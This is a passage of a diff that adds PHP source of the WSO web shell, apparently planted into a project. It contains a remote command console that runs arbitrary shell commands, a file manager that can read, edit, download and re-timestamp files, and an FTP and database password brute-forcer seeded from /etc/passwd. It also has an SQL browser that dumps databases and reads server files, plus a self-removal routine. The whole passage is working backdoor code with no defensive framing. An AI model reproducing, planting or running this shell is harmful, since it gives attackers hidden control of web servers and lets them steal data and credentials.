+		elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i]))
+			$dirs[] = array_merge($tmp, array('type' => 'dir'));
+	}
+	$GLOBALS['sort'] = $sort;
+	function wsoCmp($a, $b) {
+		if($GLOBALS['sort'][0] != 'size')
+			return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
+		else
+			return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
+	}
+	usort($files, "wsoCmp");
+	usort($dirs, "wsoCmp");
+	$files = array_merge($dirs, $files);
+	$l = 0;
+	foreach($files as $f) {
+		echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
+			.'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
+		$l = $l?0:1;
+	}
+	echo "<tr><td colspan=7>
+	<input type=hidden name=a value='FilesMan'>
+	<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
+	<input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
+	<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
+    if(class_exists('ZipArchive'))
+        echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
+    echo "<option value='tar'>Compress (tar.gz)</option>";
+    if(!empty($_COOKIE['act']) && @count($_COOKIE['f']))
+        echo "<option value='paste'>Paste / Compress</option>";
+    echo "</select>&nbsp;";
+    if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
+        echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>&nbsp;";
+    echo "<input type='submit' value='>>'></td></tr></form></table></div>";
+	wsoFooter();
+}
+
+function actionStringTools() {
+	if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
+    if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
+	if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
+	if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
+	if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
+	$stringTools = array(
+		'Base64 encode' => 'base64_encode',
+		'Base64 decode' => 'base64_decode',
+		'Url encode' => 'urlencode',
+		'Url decode' => 'urldecode',
+		'Full urlencode' => 'full_urlencode',
+		'md5 hash' => 'md5',
+		'sha1 hash' => 'sha1',
+		'crypt' => 'crypt',
+		'CRC32' => 'crc32',
+		'ASCII to HEX' => 'ascii2hex',
+		'HEX to ASCII' => 'hex2ascii',
+		'HEX to DEC' => 'hexdec',
+		'HEX to BIN' => 'hex2bin',
+		'DEC to HEX' => 'dechex',
+		'DEC to BIN' => 'decbin',
+		'BIN to HEX' => 'binhex',
+		'BIN to DEC' => 'bindec',
+		'String to lower case' => 'strtolower',
+		'String to upper case' => 'strtoupper',
+		'Htmlspecialchars' => 'htmlspecialchars',
+		'String length' => 'strlen',
+	);
+	if(isset($_POST['ajax'])) {
+		WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true);
+		ob_start();
+		if(in_array($_POST['p1'], $stringTools))
+			echo $_POST['p1']($_POST['p2']);
+		$temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
+		echo strlen($temp), "\n", $temp;
+		exit;
+	}
+    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
+		WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0);
+	wsoHeader();
+	echo '<h1>String conversions</h1><div class=content>';
+	echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
+	foreach($stringTools as $k => $v)
+		echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
+		echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
+	if(!empty($_POST['p1'])) {
+		if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
+	}
+	echo"</pre></div><br><h1>Search files:</h1><div class=content>
+		<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
+			<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
+			<tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
+			<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
+			<tr><td></td><td><input type='submit' value='>>'></td></tr>
+			</table></form>";
+
+	function wsoRecursiveGlob($path) {
+		if(substr($path, -1) != '/')
+			$path.='/';
+		$paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
+		if(is_array($paths)&&@count($paths)) {
+			foreach($paths as $item) {
+				if(@is_dir($item)){
+					if($path!=$item)
+						wsoRecursiveGlob($item);
+				} else {
+					if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false)
+						echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\",\"\")'>".htmlspecialchars($item)."</a><br>";
+				}
+			}
+		}
+	}
+	if(@$_POST['p3'])
+		wsoRecursiveGlob($_POST['c']);
+	echo "</div><br><h1>Search for hash:</h1><div class=content>
+		<form method='post' target='_blank' name='hf'>
+			<input type='text' name='hash' style='width:200px;'><br>
+            <input type='hidden' name='act' value='find'/>
+			<input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
+			<input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
+            <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>
+		</form></div>";
+	wsoFooter();
+}
+
+function actionFilesTools() {
+	if( isset($_POST['p1']) )
+		$_POST['p1'] = urldecode($_POST['p1']);
+	if(@$_POST['p2']=='download') {
+		if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
+			ob_start("ob_gzhandler", 4096);
+			header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
+			if (function_exists("mime_content_type")) {
+				$type = @mime_content_type($_POST['p1']);
+				header("Content-Type: " . $type);
+			} else
+                header("Content-Type: application/octet-stream");
+			$fp = @fopen($_POST['p1'], "r");
+			if($fp) {
+				while(!@feof($fp))
+					echo @fread($fp, 1024);
+				fclose($fp);
+			}
+		}exit;
+	}
+	if( @$_POST['p2'] == 'mkfile' ) {
+		if(!file_exists($_POST['p1'])) {
+			$fp = @fopen($_POST['p1'], 'w');
+			if($fp) {
+				$_POST['p2'] = "edit";
+				fclose($fp);
+			}
+		}
+	}
+	wsoHeader();
+	echo '<h1>File tools</h1><div class=content>';
+	if( !file_exists(@$_POST['p1']) ) {
+		echo 'File not exists';
+		wsoFooter();
+		return;
+	}
+	$uid = @posix_getpwuid(@fileowner($_POST['p1']));
+	if(!$uid) {
+		$uid['name'] = @fileowner($_POST['p1']);
+		$gid['name'] = @filegroup($_POST['p1']);
+	} else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
+	echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
+	echo '<span>Change time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
+	if( empty($_POST['p2']) )
+		$_POST['p2'] = 'view';
+	if( is_file($_POST['p1']) )
+		$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
+	else
+		$m = array('Chmod', 'Rename', 'Touch');
+	foreach($m as $v)
+		echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
+	echo '<br><br>';
+	switch($_POST['p2']) {
+		case 'view':
+			echo '<pre class=ml1>';
+			$fp = @fopen($_POST['p1'], 'r');
+			if($fp) {
+				while( !@feof($fp) )
+					echo htmlspecialchars(@fread($fp, 1024));
+				@fclose($fp);
+			}
+			echo '</pre>';
+			break;
+		case 'highlight':
+			if( @is_readable($_POST['p1']) ) {
+				echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
+				$code = @highlight_file($_POST['p1'],true);
+				echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
+			}
+			break;
+		case 'chmod':
+			if( !empty($_POST['p3']) ) {
+				$perms = 0;
+				for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
+					$perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
+				if(!@chmod($_POST['p1'], $perms))
+					echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
+			}
+			clearstatcache();
+			echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
+			break;
+		case 'edit':
+			if( !is_writable($_POST['p1'])) {
+				echo 'File isn\'t writeable';
+				break;
+			}
+			if( !empty($_POST['p3']) ) {
+				$time = @filemtime($_POST['p1']);
+				$_POST['p3'] = substr($_POST['p3'],1);
+				$fp = @fopen($_POST['p1'],"w");
+				if($fp) {
+					@fwrite($fp,$_POST['p3']);
+					@fclose($fp);
+					echo 'Saved!<br><script>p3_="";</script>';
+					@touch($_POST['p1'],$time,$time);
+				}
+			}
+			echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
+			$fp = @fopen($_POST['p1'], 'r');
+			if($fp) {
+				while( !@feof($fp) )
+					echo htmlspecialchars(@fread($fp, 1024));
+				@fclose($fp);
+			}
+			echo '</textarea><input type=submit value=">>"></form>';
+			break;
+		case 'hexdump':
+			$c = @file_get_contents($_POST['p1']);
+			$n = 0;
+			$h = array('00000000<br>','','');
+			$len = strlen($c);
+			for ($i=0; $i<$len; ++$i) {
+				$h[1] .= sprintf('%02X',ord($c[$i])).' ';
+				switch ( ord($c[$i]) ) {
+					case 0:  $h[2] .= ' '; break;
+					case 9:  $h[2] .= ' '; break;
+					case 10: $h[2] .= ' '; break;
+					case 13: $h[2] .= ' '; break;
+					default: $h[2] .= $c[$i]; break;
+				}
+				$n++;
+				if ($n == 32) {
+					$n = 0;
+					if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
+					$h[1] .= '<br>';
+					$h[2] .= "\n";
+				}
+		 	}
+			echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
+			break;
+		case 'rename':
+			if( !empty($_POST['p3']) ) {
+				if(!@rename($_POST['p1'], $_POST['p3']))
+					echo 'Can\'t rename!<br>';
+				else
+					die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
+			}
+			echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
+			break;
+		case 'touch':
+			if( !empty($_POST['p3']) ) {
+				$time = strtotime($_POST['p3']);
+				if($time) {
+					if(!touch($_POST['p1'],$time,$time))
+						echo 'Fail!';
+					else
+						echo 'Touched!';
+				} else echo 'Bad time format!';
+			}
+			clearstatcache();
+			echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
+			break;
+	}
+	echo '</div>';
+	wsoFooter();
+}
+
+function actionConsole() {
+    if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
+        WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true);
+        $_POST['p1'] .= ' 2>&1';
+    } elseif(!empty($_POST['p1']))
+        WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0);
+
+	if(isset($_POST['ajax'])) {
+		WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true);
+		ob_start();
+		echo "d.cf.cmd.value='';\n";
+		$temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0"));
+		if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match))	{
+			if(@chdir($match[1])) {
+				$GLOBALS['cwd'] = @getcwd();
+				echo "c_='".$GLOBALS['cwd']."';";
+			}
+		}
+		echo "d.cf.output.value+='".$temp."';";
+		echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
+		$temp = ob_get_clean();
+		echo strlen($temp), "\n", $temp;
+		exit;
+	}
+    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
+		WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0);
+	wsoHeader();
+    echo "<script>
+if(window.Event) window.captureEvents(Event.KEYDOWN);
+var cmds = new Array('');
+var cur = 0;
+function kp(e) {
+	var n = (window.Event) ? e.which : e.keyCode;
+	if(n == 38) {
+		cur--;
+		if(cur>=0)
+			document.cf.cmd.value = cmds[cur];
+		else
+			cur++;
+	} else if(n == 40) {
+		cur++;
+		if(cur < cmds.length)
+			document.cf.cmd.value = cmds[cur];
+		else
+			cur--;
+	}
+}
+function add(cmd) {
+	cmds.pop();
+	cmds.push(cmd);
+	cmds.push('');
+	cur = cmds.length-1;
+}
+</script>";
+	echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
+	foreach($GLOBALS['aliases'] as $n => $v) {
+		if($v == '') {
+			echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
+			continue;
+		}
+		echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
+	}
+	
+	echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
+	if(!empty($_POST['p1'])) {
+		echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1']));
+	}
+	echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
+	echo '</form></div><script>d.cf.cmd.focus();</script>';
+	wsoFooter();
+}
+
+function actionLogout() {
+    setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
+	die('bye!');
+}
+
+function actionSelfRemove() {
+
+	if($_POST['p1'] == 'yes')
+		if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
+			die('Shell has been removed');
+		else
+			echo 'unlink error!';
+    if($_POST['p1'] != 'yes')
+        wsoHeader();
+	echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
+	wsoFooter();
+}
+
+function actionBruteforce() {
+	wsoHeader();
+	if( isset($_POST['proto']) ) {
+		echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
+		if( $_POST['proto'] == 'ftp' ) {
+			function wsoBruteForce($ip,$port,$login,$pass) {
+				$fp = @ftp_connect($ip, $port?$port:21);
+				if(!$fp) return false;
+				$res = @ftp_login($fp, $login, $pass);
+				@ftp_close($fp);
+				return $res;
+			}
+		} elseif( $_POST['proto'] == 'mysql' ) {
+			function wsoBruteForce($ip,$port,$login,$pass) {
+				$res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass);
+				@mysql_close($res);
+				return $res;
+			}
+		} elseif( $_POST['proto'] == 'pgsql' ) {
+			function wsoBruteForce($ip,$port,$login,$pass) {
+				$str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
+				$res = @pg_connect($str);
+				@pg_close($res);
+				return $res;
+			}
+		}
+		$success = 0;
+		$attempts = 0;
+		$server = explode(":", $_POST['server']);
+		if($_POST['type'] == 1) {
+			$temp = @file('/etc/passwd');
+			if( is_array($temp) )
+				foreach($temp as $line) {
+					$line = explode(":", $line);
+					++$attempts;
+					if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
+						$success++;
+						echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
+					}
+					if(@$_POST['reverse']) {
+						$tmp = "";
+						for($i=strlen($line[0])-1; $i>=0; --$i)
+							$tmp .= $line[0][$i];
+						++$attempts;
+						if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
+							$success++;
+							echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
+						}
+					}
+				}
+		} elseif($_POST['type'] == 2) {
+			$temp = @file($_POST['dict']);
+			if( is_array($temp) )
+				foreach($temp as $line) {
+					$line = trim($line);
+					++$attempts;
+					if( wsoBruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
+						$success++;
+						echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
+					}
+				}
+		}
+		echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
+	}
+	echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
+		.'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
+		.'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
+		.'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
+		.'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
+		.'<span>Server:port</span></td>'
+		.'<td><input type=text name=server value="127.0.0.1"></td></tr>'
+		.'<tr><td><span>Brute type</span></td>'
+		.'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
+		.'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
+		.'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
+		.'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
+		.'<td><input type=text name=login value="root"></td></tr>'
+		.'<tr><td><span>Dictionary</span></td>'
+		.'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
+		.'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
+	echo '</div><br>';
+	wsoFooter();
+}
+
+function actionSql() {
+	class DbClass {
+		var $type;
+		var $link;
+		var $res;
+		function DbClass($type)	{
+			$this->type = $type;
+		}
+		function connect($host, $user, $pass, $dbname){
+			switch($this->type)	{
+				case 'mysql':
+					if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
+					break;
+				case 'pgsql':
+					$host = explode(':', $host);
+					if(!$host[1]) $host[1]=5432;
+					if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
+					break;
+			}
+			return false;
+		}
+		function selectdb($db) {
+			switch($this->type)	{
+				case 'mysql':
+					if (@mysql_select_db($db))return true;
+					break;
+			}
+			return false;
+		}
+		function query($str) {
+			switch($this->type) {
+				case 'mysql':
+					return $this->res = @mysql_query($str);
+					break;
+				case 'pgsql':
+					return $this->res = @pg_query($this->link,$str);
+					break;
+			}
+			return false;
+		}
+		function fetch() {
+			$res = func_num_args()?func_get_arg(0):$this->res;
+			switch($this->type)	{
+				case 'mysql':
+					return @mysql_fetch_assoc($res);
+					break;
+				case 'pgsql':
+					return @pg_fetch_assoc($res);
+					break;
+			}
+			return false;
+		}
+		function listDbs() {
+			switch($this->type)	{
+				case 'mysql':
+                        return $this->query("SHOW databases");
+				break;
+				case 'pgsql':
+					return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
+				break;
+			}
+			return false;
+		}
+		function listTables() {
+			switch($this->type)	{
+				case 'mysql':
+					return $this->res = $this->query('SHOW TABLES');
+				break;
+				case 'pgsql':
+					return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
+				break;
+			}
+			return false;
+		}
+		function error() {
+			switch($this->type)	{
+				case 'mysql':
+					return @mysql_error();
+				break;
+				case 'pgsql':
+					return @pg_last_error();
+				break;
+			}
+			return false;
+		}
+		function setCharset($str) {
+			switch($this->type)	{
+				case 'mysql':
+					if(function_exists('mysql_set_charset'))
+						return @mysql_set_charset($str, $this->link);
+					else
+						$this->query('SET CHARSET '.$str);
+					break;
+				case 'pgsql':
+					return @pg_set_client_encoding($this->link, $str);
+					break;
+			}
+			return false;
+		}
+		function loadFile($str) {
+			switch($this->type)	{
+				case 'mysql':
+					return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
+				break;
+				case 'pgsql':
+					$this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
+					$r=array();
+					while($i=$this->fetch())
+						$r[] = $i['file'];
+					$this->query('drop table wso2');
+					return array('file'=>implode("\n",$r));
+				break;
+			}
+			return false;
+		}
+		function dump($table, $fp = false) {
+			switch($this->type)	{
+				case 'mysql':
+					$res = $this->query('SHOW CREATE TABLE `'.$table.'`');
+					$create = mysql_fetch_array($res);
+					$sql = $create[1].";\n";
+                    if($fp) fwrite($fp, $sql); else echo($sql);
+					$this->query('SELECT * FROM `'.$table.'`');
+                    $i = 0;
+                    $head = true;
+					while($item = $this->fetch()) {
+                        $sql = '';
+                        if($i % 1000 == 0) {
+                            $head = true;
+                            $sql = ";\n\n";
+                        }
+
+						$columns = array();
+						foreach($item as $k=>$v) {
+                            if($v === null)
+                                $item[$k] = "NULL";
+                            elseif(is_int($v))
+                                $item[$k] = $v;
+                            else
+                                $item[$k] = "'".@mysql_real_escape_string($v)."'";
+							$columns[] = "`".$k."`";
+						}
+                        if($head) {
+                            $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
+                            $head = false;
+                        } else
+                            $sql .= "\n\t,(".implode(", ", $item).')';
+                        if($fp) fwrite($fp, $sql); else echo($sql);
+                        $i++;
+					}
+                    if(!$head)
+                        if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
+				break;
+				case 'pgsql':
+					$this->query('SELECT * FROM '.$table);
+					while($item = $this->fetch()) {
+						$columns = array();
+						foreach($item as $k=>$v) {
+							$item[$k] = "'".addslashes($v)."'";
+							$columns[] = $k;
+						}
+                        $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
+                        if($fp) fwrite($fp, $sql); else echo($sql);
+					}
+				break;
+			}
+			return false;
+		}
+	};
+	$db = new DbClass($_POST['type']);
+	if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) {
+		$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
+		$db->selectdb($_POST['sql_base']);
+        switch($_POST['charset']) {
+            case "Windows-1251": $db->setCharset('cp1251'); break;
+            case "UTF-8": $db->setCharset('utf8'); break;
+            case "KOI8-R": $db->setCharset('koi8r'); break;
+            case "KOI8-U": $db->setCharset('koi8u'); break;
+            case "cp866": $db->setCharset('cp866'); break;
+        }
+        if(empty($_POST['file'])) {
+            ob_start("ob_gzhandler", 4096);
+            header("Content-Disposition: attachment; filename=dump.sql");
+            header("Content-Type: text/plain");
+            foreach($_POST['tbl'] as $v)
+				$db->dump($v);
+            exit;
+        } elseif($fp = @fopen($_POST['file'], 'w')) {
+            foreach($_POST['tbl'] as $v)
+                $db->dump($v, $fp);
+            fclose($fp);
+            unset($_POST['p2']);
+        } else
+            die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
+	}
+	wsoHeader();
+	echo "
+<h1>Sql browser</h1><div class=content>
+<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
+<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
+<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
+<td><select name='type'><option value='mysql' ";
+    if(@$_POST['type']=='mysql')echo 'selected';
+echo ">MySql</option><option value='pgsql' ";
+if(@$_POST['type']=='pgsql')echo 'selected';
+echo ">PostgreSql</option></select></td>
+<td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td>
+<td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td>
+<td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\"></td><td>";
+	$tmp = "<input type=text name=sql_base value=''>";
+	if(isset($_POST['sql_host'])){
+		if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
+			switch($_POST['charset']) {
+				case "Windows-1251": $db->setCharset('cp1251'); break;
+				case "UTF-8": $db->setCharset('utf8'); break;
+				case "KOI8-R": $db->setCharset('koi8r'); break;
+				case "KOI8-U": $db->setCharset('koi8u'); break;
+				case "cp866": $db->setCharset('cp866'); break;
+			}
+			$db->listDbs();
+			echo "<select name=sql_base><option value=''></option>";
+			while($item = $db->fetch()) {
+				list($key, $value) = each($item);
+				echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
+			}
+			echo '</select>';
+		}
+		else echo $tmp;
+	}else
+		echo $tmp;
+	echo "</td>
+				<td><input type=submit value='>>' onclick='fs(d.sf);'></td>
+                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
+			</tr>
+		</table>
+		<script>
+            s_db='".@addslashes($_POST['sql_base'])."';
+            function fs(f) {
